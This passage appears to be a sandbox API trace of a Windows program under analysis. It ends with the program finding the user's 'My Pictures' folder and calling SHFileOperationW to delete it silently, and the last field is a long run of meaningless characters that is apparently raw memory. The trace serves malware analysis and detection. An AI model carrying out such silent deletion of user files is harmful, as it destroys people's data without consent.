wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.527] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0218.527] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0218.527] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0218.527] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0218.527] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0218.527] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0218.527] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.530] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.530] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0218.530] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.531] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0218.531] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0218.531] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.531] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.531] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.531] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.531] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.531] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0218.531] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.531] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0218.531] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.531] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.531] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0218.531] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.531] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0218.531] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.531] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.531] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.531] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.531] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.531] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0218.531] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.531] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0218.532] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0218.532] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.532] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.532] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.532] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.532] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.532] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.532] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0218.532] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.532] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0218.532] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.532] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.532] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0218.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0218.532] CryptReleaseContext (hProv=0xa7bc48, dwFlags=0x0) returned 1 [0218.532] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.532] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.532] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.532] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.532] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.532] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.532] FreeLibrary (hLibModule=0x76390000) returned 1 [0218.533] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.533] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.533] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.533] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.533] CloseHandle (hObject=0x4b0) returned 1 [0218.533] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.533] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.533] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0218.533] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0218.533] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/My Pictures", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Pictures", lpFilePart=0x8cedf4*="My Pictures") returned 0x25 [0218.533] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Pictures" (normalized: "c:\\users\\fd1hvy\\documents\\my pictures")) returned 0x2416 [0218.533] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Pictures\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0xe, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x120a58, ftLastAccessTime.dwLowDateTime=0x47558b, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x7626d180, nFileSizeLow=0x4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.534] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0218.534] GetLastError () returned 0x6 [0218.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854920 | out: hHeap=0x2af0000) returned 1 [0218.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0218.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0218.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0218.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0218.534] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0218.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0218.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0218.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0218.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0218.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0218.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0218.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0218.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0218.534] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0218.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0218.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0218.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf18 [0218.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0218.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0218.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0218.538] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0218.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0218.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0218.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0218.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0218.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0218.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0218.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0218.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0218.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0218.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0218.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0218.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38540b0 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0218.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0218.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eb3c8 [0218.540] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/My Pictures", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Pictures", lpFilePart=0x8cf650*="My Pictures") returned 0x25 [0218.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb3c8 | out: hHeap=0x2af0000) returned 1 [0218.540] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Pictures" (normalized: "c:\\users\\fd1hvy\\documents\\my pictures")) returned 0x2416 [0218.540] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\My Pictures", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡